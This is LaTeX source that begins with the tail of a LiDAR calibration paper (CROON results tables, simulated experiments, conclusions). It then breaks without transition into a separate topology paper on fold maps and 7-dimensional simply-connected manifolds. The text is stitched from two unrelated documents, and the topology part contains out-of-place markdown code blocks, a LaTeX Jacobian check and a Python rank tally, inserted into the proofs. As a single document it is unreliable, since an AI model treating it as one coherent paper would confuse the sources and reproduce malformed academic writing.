\caption{Comparison with two other target-less methods; CROON achieves good results in all 6 degrees of freedom.}{
\begin{tabular}{ccllcccc}
\hline
\multirow{2}{*}{Method} & \multirow{2}{*}{scene} & \multicolumn{3}{c}{Rotation{[}deg{]}} & \multicolumn{3}{c}{Translation{[}m{]}} \\ \cline{3-8}
& & pitch & roll & yaw & x & y & z \\ \hline
\multirow{3}{*}{\begin{tabular}[c]{@{}c@{}}Single \\ Planar \\ Board\cite{RN20}\end{tabular}} & config1 & -0.0264 & -1.0449 & -0.3068 & 0.0094 & -0.0098 & 0.0314 \\ \cline{2-8}
& config2 & 0.1587 & -0.3132 & -0.7868 & \textbf{0.0026} & \textbf{0.0029} & \textbf{-0.0105} \\ \cline{2-8}
& config3 & 1.023 & -0.0902 & 0.1441 & \textbf{-0.0011} & -0.0033 & -0.0162 \\ \hline
\multirow{2}{*}{\begin{tabular}[c]{@{}c@{}}Planar \\ Surfaces\cite{RN18}\end{tabular}} & config1 & \textbf{-0.0097} & \textbf{-0.0084} & -0.0149 & -0.0407 & 0.0358 & 0.0416 \\ \cline{2-8}
& config2 & 0.0172 & 0.0165 & \textbf{-0.0017} & 0.0541 & 0.0123 & 0.0632 \\ \hline
CROON & all & \textbf{-0.0083} & \textbf{0.0031} & \multicolumn{1}{l}{\textbf{-0.0006}} & \multicolumn{1}{l}{-0.0043} & \multicolumn{1}{l}{\textbf{0.0001}} & \multicolumn{1}{l}{\textbf{-0.0006}} \\ \hline
\end{tabular}
}
\label{compare results}
\end{table*}
\subsubsection{Calibration Consistency Evaluation}
We test our method in ten different scenes, with 250 groups of different initial values in each scene. In Fig.\ref{plotbox of real scene}, the $x$-axis represents the different road scenes, and the $y$-axis represents the mean and standard deviation of the 6 degrees of freedom. In each scene, the means of the different rounds of measurement are close to each other, which demonstrates the consistency and accuracy of our method. More importantly, all the standard deviations in the different scenes are close to 0, which shows the robustness and stability of our method. It is worth mentioning that our method obtains excellent results for the $z$ translation because it exploits the characteristics of road scenes.
\subsection{Simulated Experiment}
Compared with the real-world data, the simulation engine provides accurate ground truth while the other influencing factors are controlled. In the simulated experiment, we first collect simulated point cloud data in different road scenes in the Carla engine. The data are collected while the virtual car drives automatically, and we can directly regard all LiDARs as time-synchronized. The unreal-world data set includes 1899 frames of point clouds in total. The simulated experiment results are mainly used for quantitative analysis to further demonstrate the robustness, stability, and accuracy of our method.
\subsubsection{Quantitative Experiments}
Similar to the experiments on the real-world data set, we randomly initialize the parameters and then calculate the means and standard deviations of all results. Our method can successfully calibrate more than 1798 (94.7\%) of the road scenes, and Table \ref{unreal world statistic results} shows the quantitative results. Although the error on the unreal-world data set is small enough, CROON performs even better on the real-world data set, because everything in the real world has small defects and errors that can be regarded as distinctive characteristics for registration. Some failure cases are shown in Fig.\ref{simulated data set bad case}.
\begin{figure}[ht]
\centering
\includegraphics[scale=0.12]{figures/bad_case_v2.png}
\caption{Failure cases. (a) The surroundings are identical in all directions of the scene. (b) A truck on the right of the car blocks the right LiDAR.}
\label{simulated data set bad case}
\end{figure}
\subsubsection{Comparison Experiments}
We compare our method with \cite{RN18} and \cite{RN20}, which also perform automatic calibration and use as little prior information as possible. Table \ref{compare results} shows the quantitative comparison of the three methods. Our method obtains the best results in $angle_{pitch}$, $angle_{roll}$, $angle_{yaw}$, $y$ and $z$. It should be pointed out that our method has two further advantages: 1) it performs well under thousands of groups of significant random initial extrinsic errors and in different road scenes; 2) it performs better in the real world because real road scenes contain more disordered targets and irregular lines and surfaces.
\section{CONCLUSIONS}
In this paper, we propose CROON, a LiDAR-to-LiDAR automatic extrinsic calibration method for road scenes that finds a set of highly precise transformations between the front, back, left and right LiDARs and the top LiDAR. The method is a rough-to-fine framework that calibrates accurately from an arbitrary initial pose. Meanwhile, because of the rich geometric constraints in the raw data and the characteristics of the road scene, our method can compute the result quickly and independently. More essentially, all the source code and data, including the real and simulated scenes in this paper, are available to benefit the community.
\bibliographystyle{IEEEtran}
\label{sec:1}
\subsection{Smooth maps and fold maps.}
{\it Fold} maps are higher dimensional versions of Morse functions and fundamental tools in the present paper and in an area which we can regard as a higher dimensional version of the theory of Morse functions and its applications to algebraic topology and differential topology.
A {\it singular} point of a differentiable map is a point in the domain at which the dimension of the image of the differential is smaller than both the dimension of the domain and that of the target. The set of all the singular points is the {\it singular set} of the map. The image of the singular set is the {\it singular value set} of the map. The {\it regular value set} of the map is the complementary set of the singular value set of the map. A {\it singular {\rm (}regular{\rm )} value} means a point in the singular (resp. regular) value set.
Throughout the present paper, manifolds, maps between them, (boundary) connected sums of manifolds, and other fundamental notions are considered in the smooth category (in the class $C^{\infty}$) unless otherwise stated.
For a smooth map $c$, $S(c)$ denotes the singular set of $c$.
\begin{Def}
\label{def:1}
Let $m \geq n \geq 1$ be integers.
A smooth map from an $m$-dimensional smooth manifold with no boundary into an $n$-dimensional smooth manifold with no boundary is said to be a {\it fold} map if at each singular point $p$, it has the form
$$(x_1, \cdots, x_m) \mapsto (x_1,\cdots,x_{n-1},\sum_{k=n}^{m-i(p)}{x_k}^2-\sum_{k=m-i(p)+1}^{m}{x_k}^2)$$
for suitable coordinates and a suitable integer $i(p)$ satisfying $0 \leq i(p) \leq \frac{m-n+1}{2}$.
\end{Def}
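As a sanity check of the normal form (a standard computation added here for illustration, not part of the original text), one can verify the first two assertions of Proposition \ref{prop:1} directly; for brevity the special generic case $i(p)=0$ is displayed, the general case differing only in the signs of the last row:

```latex
% Jacobian of the fold normal form
% f(x_1,...,x_m) = (x_1,...,x_{n-1}, \sum_{k=n}^{m} x_k^2):
\[
Jf(x) \;=\;
\begin{pmatrix}
I_{n-1} & 0 \\
0 & \begin{pmatrix} 2x_n & 2x_{n+1} & \cdots & 2x_m \end{pmatrix}
\end{pmatrix}
\]
% Hence rank Jf(x) < n exactly when x_n = \cdots = x_m = 0, so locally
% S(f) = \{x_n = \cdots = x_m = 0\}, an (n-1)-dimensional submanifold, and
% f|_{S(f)}: (x_1,...,x_{n-1}) \mapsto (x_1,...,x_{n-1}, 0) is an immersion.
```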
\begin{Prop}
\label{prop:1}
For a fold map $f$ in Definition \ref{def:1}, $S(f)$ is an {\rm (}$n-1${\rm )}-dimensional closed and smooth submanifold with no boundary, $f {\mid}_{S(f)}$ is an immersion and $i(p)$ is unique for any $p \in S(f)$.
\end{Prop}
We call $i(p)$ the {\it index} of $p$ there.
\begin{Def}
\label{def:2}
A fold map is said to be {\it special generic} if the index $i(p)$ is always $0$ for any singular point $p$.
\end{Def}
\subsection{Some classes of 7-dimensional closed and simply-connected manifolds.}
${\mathbb{R}}^k$ denotes the $k$-dimensional Euclidean space.
For a point $x \in {\mathbb{R}}^n$, $||x||$ denotes the distance between $x$ and the origin $0$ where the underlying metric is the standard Euclidean metric: it also denotes the value of the Euclidean norm at the vector $x \in {\mathbb{R}}^n$.
$S^k:=\{x \in {\mathbb{R}}^{k+1}\mid ||x||=1.\}$ denotes the $k$-dimensional unit sphere and $D^k:=\{x \in {\mathbb{R}}^{k}\mid ||x|| \leq 1.\}$ denotes the $k$-dimensional unit disk. ${\mathbb{C}P}^k$ denotes the $k$-dimensional complex projective space, which is a $k$-dimensional closed and simply-connected complex manifold.
A {\it homotopy} sphere means a smooth manifold homeomorphic to a unit sphere. It is said to be {\it exotic} if it is not diffeomorphic to any unit sphere. If it is diffeomorphic to the $k$-dimensional unit sphere, then it is a $k$-dimensional {\it standard} sphere.
$7$-dimensional closed and simply-connected manifolds are important objects in the theory of classical algebraic topology and differential topology (of higher dimensional closed and simply-connected manifolds).
\begin{itemize}
\item There exist exactly $28$ types of $7$-dimensional oriented homotopy spheres. See \cite{milnor}, which is a pioneering work, and see also \cite{eellskuiper} for example.
\item (\cite{crowleyescher}, \cite{crowleynordstrom}, and so on.)
$7$-dimensional closed and $2$-connected manifolds are classified via concrete algebraic topological theory.
\item (\cite{kreck}.) The previous classification is extended to one for the class of $7$-dimensional closed and simply-connected manifolds whose 2nd integral homology groups are free.
\item(\cite{wang}.) There exists a one-to-one correspondence between the topologies of $7$-dimensional, closed, simply-connected and spin manifolds whose integral cohomology rings are isomorphic to that of ${\mathbb{C}P}^2 \times S^3$ and 2nd integral cohomology classes which are divisible by $4$. A closed and oriented manifold $X$ having such a topology is represented as a connected sum of $X$ and a $7$-dimensional oriented homotopy sphere $\Sigma$. Furthermore, between two of these manifolds, there exists an orientation-preserving diffeomorphism if and only if between the oriented homotopy spheres appearing in the definition, there exists an orientation-preserving diffeomorphism.
\end{itemize}
\subsection{Fold maps on $7$-dimensional closed and simply-connected manifolds and a main theorem.}
The class of special generic maps contains Morse functions with exactly two singular points on homotopy spheres, playing important roles in so-called Reeb's theorem and canonical projections of unit spheres, for example. Related to this and more general fundamental theory of Morse functions and decompositions of the manifolds into {\it handles} associated with the functions, see \cite{milnor2} for example.
Proving that the canonical projections of unit spheres are fold maps and special generic is an exercise in the fundamental theory of differentiable manifolds, smooth maps and Morse functions.
\begin{Thm}[\cite{calabi}, \cite{saeki}, \cite{saeki2}, \cite{wrazidlo} and so on.]
\label{thm:1}
$7$-dimensional {\it exotic} homotopy spheres admit no special generic maps into ${\mathbb{R}}^n$ for $n=4,5,6$. Oriented exotic homotopy spheres of 14 types admit no special generic maps into ${\mathbb{R}}^3$.
\end{Thm}
A bundle whose fiber is a (smooth) manifold is assumed to be {\it smooth} unless otherwise stated: a {\it smooth} bundle is a bundle whose structure group is a subgroup of the diffeomorphism group of the fiber, where the {\it diffeomorphism group} of a (smooth) manifold is the group of all its (smooth) diffeomorphisms.
\begin{Thm}[\cite{kitazawa2}]
\label{thm:2}
Every $7$-dimensional homotopy sphere admits a fold map $f$ into ${\mathbb{R}}^4$ such that $f {\mid}_{S(f)}$ is an embedding and that $f(S(f))=\{x \mid ||x||=1,2,3.\}$. Furthermore, we have the following three statements.
\begin{enumerate}
\item We can obtain this map $f$ so that for any connected component $C \subset f(S(f))$, there exists a small closed tubular neighborhood $N(C)$ so that the composition of $f {\mid}_{f^{-1}(N(C))}:f^{-1}(N(C)) \rightarrow N(C)$ with the canonical projection to $C$ gives a trivial smooth bundle.
\item In the previous statement, we can replace $f(S(f))=\{x \mid ||x||=1,2,3.\}$ by $f(S(f))=\{x \mid ||x||=1.\}$ if and only if the homotopy sphere is diffeomorphic to the unit sphere.
\item As the previous statement, we can replace $f(S(f))=\{x \mid ||x||=1,2,3.\}$ by $f(S(f))=\{x \mid ||x||=1,2.\}$ if and only if the homotopy sphere is represented as the total space of a smooth bundle over $S^4$ whose fiber is diffeomorphic to $S^3$. There exist exactly $16$ types of $7$-dimensional oriented homotopy spheres satisfying this property by virtue of \cite{eellskuiper}.
\end{enumerate}
\end{Thm}
\begin{Thm}[\cite{kitazawa8}]
\label{thm:3}
Every $7$-dimensional manifold of \cite{wang}, presented in the previous subsection, admits a fold map $f$ into ${\mathbb{R}}^4$ such that $f {\mid}_{S(f)}$ is an embedding and that $f(S(f))=\{x \mid ||x|| \in \mathbb{N},\ 1 \leq ||x|| \leq l\}$ for a suitable integer $3 \leq l \leq 5$.
\end{Thm}
Hereafter, $\mathbb{N}$ denotes the set of all positive integers.
\begin{MainThm}
Let $l_0>0$ be an integer. Let $\{l_j\}_{j=1}^{l_0}$ and $\{k_j\}_{j=1}^{l_0}$ be sequences of integers of length $l_0$. Let ${l_0}^{\prime} \leq l_0$ be a positive integer.
Let ${\Pi}_{l_0,{l_0}^{\prime}}$ be a surjection from the set $\{p \in \mathbb{N} \mid 1 \leq p \leq l_0.\}$ onto the set $\{p \in \mathbb{N} \mid 1 \leq p \leq {l_0}^{\prime}.\}$.
Then there exist a $7$-dimensional closed, oriented, simply-connected and spin manifold $M$ and a {\rm stable} fold map $f:M \rightarrow {\mathbb{R}}^4$ such that the following four properties hold.
\begin{enumerate}
\item $H_2(M;\mathbb{Z}) \cong {\mathbb{Z}}^{l_0}$ and $H_3(M;\mathbb{Z}) \cong {\mathbb{Z}}^{{l_0}^{\prime}}$.
\item For suitable bases $\{a_j\}_{j=1}^{l_0} \subset H^2(M;\mathbb{Z}) \cong {\mathbb{Z}}^{l_0}$ and $\{b_j\}_{j=1}^{{l_0}^{\prime}} \subset H^4(M;\mathbb{Z}) \cong {\mathbb{Z}}^{{l_0}^{\prime}}$, the following two properties hold.
\begin{enumerate}
\item The cup product of $a_{j_1}$ and $a_{j_2}$ always vanishes for distinct $j_1$ and $j_2$.
\item The square of $a_j$ is $l_j b_{{\Pi}_{l_0,{l_0}^{\prime}}(j)}$.
\end{enumerate}
\item The 1st Pontryagin class of $M$ is ${\Sigma}_{j=1}^{l_0} k_j b_{{\Pi}_{l_0,{l_0}^{\prime}}(j)}$.
\item Connected components of the singular set of $f$ are diffeomorphic to the $3$-dimensional unit sphere. The restriction to each connected component of the singular set of $f$ is an embedding and the preimage of a singular value contains at most $2$ singular points. In addition, connected components of preimages of regular values are always diffeomorphic to $S^3$ or $S^2 \times S^1$.
\end{enumerate}
\end{MainThm}
In contrast to the results on explicit fold maps into ${\mathbb{R}}^4$ on $7$-dimensional, closed, simply-connected and spin manifolds in \cite{kitazawa6}, \cite{kitazawa7} and \cite{kitazawa9}, the squares of 2nd integral cohomology classes in Theorem \ref{thm:3} and Main Theorem may not be divisible by $2$.
The definition of a {\it stable} fold map and a proof of Main Theorem are presented in the next section.
\section{A proof of main theorem.}
\label{sec:2}
For a smooth manifold $X$, $T_pX$ denotes the tangent vector space at $p \in X$. For a smooth map $c:X \rightarrow Y$, ${dc}_p:T_pX \rightarrow T_{c(p)} Y$ denotes the differential at $p$.
\begin{Def}
\label{def:3}
A fold map $c:X \rightarrow Y$ on a closed manifold is said to be {\it stable} if for any $y \in c(S(c))$, the following two conditions are satisfied.
\begin{enumerate}
\item $c^{-1}(y)$ is a discrete set $\{p_j\}_{j=1}^l$ consisting of exactly $l>0$ points.
\item $\dim Y=\dim {\bigcap}_{j=1}^l {dc}_{p_j}(T_{p_j}X)+{\Sigma}_{j=1}^l (\dim Y-{\rm rank}\ {dc}_{p_j})$.
\end{enumerate}
\end{Def}
Note that $\dim Y-{\rm rank}\ {dc}_{p_j}=1$ there.
For example, a fold map $f$ such that $f {\mid}_{S(f)}$ is an embedding is stable.
For this notion, see also \cite{golubitskyguillemin} for example, which mainly explains fundamental and classical important theory on singularities of differentiable maps.
\begin{Def}[\cite{kitazawa}--\cite{kitazawa5}.]
\label{def:4}
Let $m \geq n \geq 2$ be integers.
A stable fold map $f:M \rightarrow {\mathbb{R}}^n$ on an $m$-dimensional closed manifold $M$ into ${\mathbb{R}}^n$ is said to be {\it round} if $f {\mid}_{S(f)}$ is an embedding and for a suitable integer $l>0$ and a suitable diffeomorphism $\phi$ on ${\mathbb{R}}^n$, $(\phi \circ f)(S(f))=\{x \mid 1 \leq ||x|| \in \mathbb{N} \leq l.\}$.
\end{Def}
This class contains canonical projections of unit spheres into the Euclidean space whose dimension is greater than $1$, stable fold maps in Theorems \ref{thm:2} and \ref{thm:3}, and so on. We can define this notion for $n=1$ and this class contains Morse functions with exactly two singular points on homotopy spheres (\cite{kitazawa5}).
A {\it linear} bundle is a smooth bundle whose fiber is diffeomorphic to a unit sphere or a unit disk and whose structure group acts linearly on the fiber. For linear bundles, characteristic classes such as {\it Stiefel-Whitney classes}, {\it Euler classes} (for {\it oriented} linear bundles), {\it Pontryagin classes}, and so on, are defined as cohomology classes of the base spaces.
We can define these notions for smooth manifolds as those of the tangent bundles.
We do not review oriented linear bundles, these characteristic classes, or so on, precisely. See \cite{milnorstasheff} for example. See also \cite{little} for Pontryagin classes of complex projective spaces and manifolds which are homotopy equivalent to them.
For a closed manifold, a homology class is said to be {\it represented by a closed {\rm (}and oriented{\rm )} submanifold with no boundary} if it is realized as the value of the homomorphism induced by the canonical inclusion map of the submanifold at the {\it fundamental class}. The fundamental class of a closed (oriented) manifold is a generator of the top homology group of the manifold (compatible with the orientation) for a coefficient commutative group: if the group is isomorphic to $\mathbb{Z}/2\mathbb{Z}$, then we do not need to orient the manifold.
For a compact manifold $X$, let $c$ be an element of the $i$-th homology group $H_i(X;\mathbb{Z})$ such that we cannot represent it as $c=rc^{\prime}$ for any $(r,c^{\prime}) \in (\mathbb{Z}-\{0,1,-1\}) \times H_i(X;\mathbb{Z})$ and such that $rc \neq 0$ for any $r \in \mathbb{Z}-\{0\}$. We can define $c^{\ast} \in H^{i}(X;\mathbb{Z})$ such that $c^{\ast}(c)=1$ and that $c^{\ast}(A)=0$ for any subgroup $A \subset H_i(X;\mathbb{Z})$ giving a representation of $H_i(X;\mathbb{Z})$ as the internal direct sum of the subgroup generated by $c$ and $A$. We can define this in a unique way and call this the {\it dual} of $c$.
The following proposition extends (some of) Theorem \ref{thm:3}.
\begin{Prop}
\label{prop:2}
Let $l$ be an integer. There exists a family $\{f_{l,k}:M_{l,k} \rightarrow {\mathbb{R}}^4\}_{k \in\mathbb{Z}}$ of round fold maps on $7$-dimensional oriented, closed, simply-connected and spin manifolds satisfying the following four properties.
\begin{enumerate}
\item
\label{prop:2.1}
$H_j(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$ for $j=0, 2, 3, 4, 5, 7$.
\item
\label{prop:2.2}
For a suitable generator of $H^2(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$, the square is $l$ times a suitable generator of $H^4(M_{l,k};\mathbb{Z})$.
\item
\label{prop:2.3}
The 1st Pontryagin class of $M_{l,k}$ is $4k$ times the generator of $H^4(M_{l,k};\mathbb{Z})$ defined just before.
\item
\label{prop:2.4}
The singular value set of each round fold map consists of exactly three connected components and $\{x \in {\mathbb{R}}^4 \mid ||x||=1,2,3.\}$. Furthermore, the preimages of a point in $\{x \in {\mathbb{R}}^4 \mid ||x||<1.\}$, one in $\{x \in {\mathbb{R}}^4 \mid 1<||x||<2.\}$, and one in $\{x \in {\mathbb{R}}^4 \mid 2<||x||<3.\}$, are diffeomorphic to $S^2 \times S^1 \sqcup S^3$, $S^2 \times S^1$ and $S^3$, respectively.
\end{enumerate}
\end{Prop}
\begin{proof}
We can prove this in a similar manner to that in the proof of Theorem \ref{thm:2} in \cite{kitazawa8}.
We present a proof which also covers this original case.
There exists a linear bundle ${M^{\prime}}_l$ over $S^4$ whose fiber is diffeomorphic to $S^2$ satisfying the following two properties.
\begin{enumerate}
\item
\label{prop:2.0-1.1}
The square of a generator of the 2nd integral cohomology group of this total space is $l$ times a generator of the $4$-th integral cohomology group.
\item
\label{prop:2.0-1.2}
The 1st Pontryagin class of the total space is $4l$ times the generator before.
\end{enumerate}
For this manifold, see articles and webpages on $6$-dimensional closed and simply-connected manifolds such as \cite{jupp}, \cite{wall}, \cite{zhubr} and \cite{zhubr2} for example.
If $l=0$, then the total space is diffeomorphic to $S^2 \times S^4$ and if $l=1$, then it is diffeomorphic to the $3$-dimensional complex projective space ${\mathbb{C}P}^3$. We have a smooth bundle ${M^{\prime}}_l \times S^1$ over $S^4$ whose fiber is diffeomorphic to $S^2 \times S^1$ by the composition of the projection of a trivial bundle over ${M^{\prime}}_l$ with the projection of the linear bundle before. We remove the interior of a smoothly embedded copy of a $4$-dimensional unit disk and the preimage for the resulting projection. We can exchange this to a stable fold map such that the restriction to the singular set is an embedding, that the singular set is diffeomorphic to $S^3$, and that the preimages of regular values are $S^3$ and $S^2 \times S^1$, respectively, for the two connected components of the regular value set. Furthermore, we can do this so that the following three hold. Rigorous understandings are left to readers and similar expositions are in \cite{kitazawa8} for $l=1$.
\begin{enumerate}
\item
\label{prop:2.0-2.1}
If an arbitrary integer $k$ is given, then the domain is a $7$-dimensional oriented, closed, simply-connected and spin manifold $M_{l,k}$ and this satisfies the following properties.
\begin{enumerate}
\item
\label{prop:2.0-2.1.1}
$H_j(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$ for $j=0, 2, 3, 4, 5, 7$.
\item
\label{prop:2.0-2.1.2}
We take a 2nd integral homology class $c$ represented by $S^2 \times \{\ast\} \subset S^2 \times S^1$ in the preimage of a regular value before. For its dual, which is a cohomology class in $H^2(M_{l,k};\mathbb{Z}) \cong \mathbb{Z}$, the square is $l$ times a generator of $H^4(M_{l,k};\mathbb{Z})$, which is the dual of an integral homology class represented by a suitable closed submanifold with no boundary and also the Poincar\'e dual to a homology class represented by the preimages of regular values, which are diffeomorphic to $S^3$ or $S^2 \times S^1$.
\item
\label{prop:2.0-2.1.3}
The 1st Pontryagin class of $M_{l,k}$ is $4k$ times the generator of $H^4(M_{l,k};\mathbb{Z})$ defined just before.
\end{enumerate}
\item
\label{prop:2.0-2.2}
For the singular value set $C$, there exists a small closed tubular neighborhood $N(C)$ and the composition of the restriction to the preimage of $N(C)$ with a canonical projection to $C$ gives a trivial smooth bundle whose fiber is diffeomorphic to a manifold obtained by removing the interior of a copy of the $4$-dimensional unit disc smoothly embedded in a manifold diffeomorphic to $S^2 \times {\rm Int}\ D^2 \subset S^2 \times D^2$.
\item
\label{prop:2.0-2.3}
The index of each singular point is $2$.
\end{enumerate}
If $l=0$, then the suitable closed submanifold in the first property here can be taken as one diffeomorphic to the $4$-dimensional unit sphere.
If $l=1$, then the suitable closed submanifold in the first property here can be taken as one diffeomorphic to the complex projective plane ${\mathbb{C}P}^2$.
We construct a desired round fold map from this surjection. We can construct a trivial bundle over the subset $\{x \in {\mathbb{R}}^4 \mid ||x|| \leq \frac{1}{2}.\} \subset {\mathbb{R}}^4$
whose fiber is diffeomorphic to $S^3 \sqcup (S^2 \times S^1)$ and whose total space is the preimage of the complementary set of ${\rm Int}\ N(C) \subset S^4$.
On the preimage of $N(C)$ for the surjection, we have the product map of a suitable Morse function on a $4$-dimensional compact manifold diffeomorphic to the fiber of the trivial bundle over $C$ before and the identity map on $C$ and glue this and the previous projection in a suitable way on the boundaries. Thus we have a desired round fold map into ${\mathbb{R}}^4$. If $l=1$, then we have a (partial) proof of Theorem \ref{thm:3}.
\end{proof}
Via fundamental arguments on deformations of Morse functions and stable fold maps, we immediately have the following proposition.
\begin{Prop}
\label{prop:3}
Let $l$ be an integer. There exists a family $\{F_{l,k}:M_{l,k} \times [0,1] \rightarrow {\mathbb{R}}^4\}_{k \in\mathbb{N}}$ of smooth homotopies such that for any $t \in [0,1]$ the maps $F_{l,k,t}$ mapping $x$ to $F_{l,k}(x,t)$ are fold maps on the $7$-dimensional oriented, closed, simply-connected and spin manifolds satisfying the following four properties.
\begin{enumerate}
\item
\label{prop:3.1}
$F_{l,k,0}=f_{l,k}$.
\item
\label{prop:3.2}
The singular set $S(F_{l,k,t})$ consists of exactly three copies of the $3$-dimensional unit sphere and on each connected component it is an embedding. Furthermore, $F_{l,k,t}(S(F_{l,k,t}))=\{x \in {\mathbb{R}}^4 \mid ||x||=2,3.\} \bigcup \{x:=(x_1,x_2,x_3,x_4) \in {\mathbb{R}}^4 \mid ||x-(\frac{3}{2}t,0,0,0)||=1.\}$.
\item
\label{prop:3.3}
For each map $F_{l,k,t}$, the preimages of a point in $\{x \in {\mathbb{R}}^4 \mid ||x||<2, ||x-(\frac{3}{2}t,0,0,0)||>1.\}$, one in $\{x \in {\mathbb{R}}^4 \mid 2<||x||<3,||x-(\frac{3}{2}t,0,0,0)||>1.\}$, one in $\{x \in {\mathbb{R}}^4 \mid ||x||<2, ||x-(\frac{3}{2}t,0,0,0)||<1.\}$, and one in $\{x \in {\mathbb{R}}^4 \mid 2<||x||<3, ||x-(\frac{3}{2}t,0,0,0)||<1.\}$, are diffeomorphic to $S^2 \times S^1$, $S^3$, $(S^2 \times S^1) \sqcup S^3$ and $S^3 \sqcup S^3$, respectively.
\item
\label{prop:3.4}
Furthermore, in the previous situation, for the preimages diffeomorphic to $(S^2 \times S^1) \sqcup S^3$ and $S^3 \sqcup S^3$, the latter $S^3$'s for these two manifolds are isotopic to $S^3$ in $(S^2 \times S^1) \sqcup S^3$ of a preimage for the map $F_{l,k,0}=f_{l,k}$ where suitable identifications of preimages are considered.
\end{enumerate}
\end{Prop}
For this, see also FIGURE \ref{fig:1}.
\begin{figure}
\includegraphics[width=40mm]{20210422roundkarano.eps}
\caption{The singular value sets of $F_{l,k,0}=f_{l,k}$ and $F_{l,k,1}$ in Proposition \ref{prop:3}: descriptions of the manifolds represent preimages.}
\label{fig:1}
\end{figure}
For a compact manifold, a closed submanifold is said to be {\it proper} if the boundary of the closed submanifold is in the boundary of the compact manifold and the interior of the submanifold is in the interior of the manifold.
We prove the main theorem.
\begin{proof}[A proof of Main Theorem]
We can easily see that $F_{l,k,1}$ is a stable fold map. $P$ denotes the subset $\{x:=(x_1,x_2,x_3,x_4) \in {\mathbb{R}}^4 \mid x_1 \geq 2.25.\}$ of ${\mathbb{R}}^4$.
We take two copies of the restriction of this stable fold map $F_{l,k,1} {\mid}_{{F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)}$. This is a smooth map on the manifold obtained by removing the tubular neighborhood of a submanifold diffeomorphic to $S^3$ in $M_{l,k}$. More precisely, this submanifold can be taken as the preimage of a regular value of a round fold map in Proposition \ref{prop:2} by (the property (\ref{prop:3.4}) in) Proposition \ref{prop:3}. By gluing these copies, we have a stable fold map on a new $7$-dimensional oriented, closed, simply-connected and spin manifold $M$. We consider the following Mayer-Vietoris sequence
$$\begin{CD}
@> >> H_j(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \\
@> >> H_j( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_j({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \\
@> >> H_j(M;\mathbb{Z}) \\
@> >>
\end{CD}$$
and we can see that $H_j(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ is zero for $j \neq 0,3,6$, isomorphic to $\mathbb{Z}$ for $j=0,6$, and isomorphic to $\mathbb{Z} \oplus \mathbb{Z}$ for $j=3$. Furthermore, $\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)$ is the manifold of the domain of a round fold map whose singular set consists of two connected components and for each point in each connected component of the regular value set of this round fold map, the preimage is empty, diffeomorphic to $S^3$ and $S^3 \times S^3$, respectively. The $6$-dimensional manifold is simply-connected and diffeomorphic to $S^3 \times S^3$. For these arguments, consult Theorem 4 and Example 6 of \cite{kitazawa3} and, as closely related papers, \cite{kitazawa} and \cite{kitazawa2}. We can easily see that ${F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)$ is diffeomorphic to $S^3 \times D^4$ by the structures of the maps.
The kernel of the homomorphism from $H_3(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ into $H_3( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_3({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ is isomorphic to $\mathbb{Z}$. We see this. We can take a basis of $H_3(\partial {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z})$ so that the two elements satisfy the following by the structures of the maps and the manifolds.
\begin{enumerate}
\item One of the two elements is represented by the preimage of a regular value of the original round fold map in Proposition \ref{prop:2}.
\item The remaining element is represented by the boundary of a $4$-dimensional proper compact submanifold in ${F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P)$. Furthermore, the $4$-dimensional compact submanifold can be taken as a manifold obtained by removing the interior of a copy of the $4$-dimensional unit disc smoothly embedded in the $4$-dimensional closed submanifold with no boundary in (\ref{prop:2.0-2.1.2}) in the proof of Proposition \ref{prop:2}. In addition, we can glue $4$-dimensional closed submanifolds on the boundaries and we have a new $4$-dimensional closed submanifold $S$ with no boundary in the resulting manifold $M$.
\end{enumerate}
On the submodule generated by the first element, the homomorphism is a monomorphism. On the submodule generated by the second element, it is zero. This completes the proof of this fact on the kernel. We easily have $H_j( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_j({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \cong H_j(M;\mathbb{Z})$ for $j=2,5$. Furthermore, by the argument on the kernel and the structure of the homomorphism, the group $H_3(M;\mathbb{Z})$ is free and its rank is\\
${\rm rank} \quad (H_3( {F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}) \oplus H_3({F_{l,k,1}}^{-1}({\mathbb{R}}^4-{\rm Int}\ P);\mathbb{Z}))-1$.
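The rank count above can be summarized by elementary bookkeeping along the exact sequence; the following sketch (plain Python, our own illustration with the ranks taken from the discussion) records the arithmetic only, not the topology.

```python
# Degree-3 Mayer-Vietoris bookkeeping: X = F^{-1}(R^4 - Int P) = S^3 x D^4,
# with boundary S^3 x S^3; H_2(boundary) = 0, so H_3(M) is the cokernel
# of the map H_3(boundary) -> H_3(X) + H_3(X).
rank_H3_boundary = 2                  # H_3(S^3 x S^3; Z) = Z^2
rank_H3_X = 1                         # H_3(S^3 x D^4; Z) = Z
rank_ker = 1                          # kernel rank shown in the text
rank_im = rank_H3_boundary - rank_ker
rank_H3_M = 2*rank_H3_X - rank_im     # the displayed rank formula
assert rank_H3_M == 1
```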
We can determine the integral homology group and the integral cohomology ring of $M$ by virtue of the Poincar\'e duality theorem and the topological structures of the manifolds and the maps. Furthermore, for example, $H_4(M;\mathbb{Z})$ is generated by a homology class represented by the submanifold $S$.
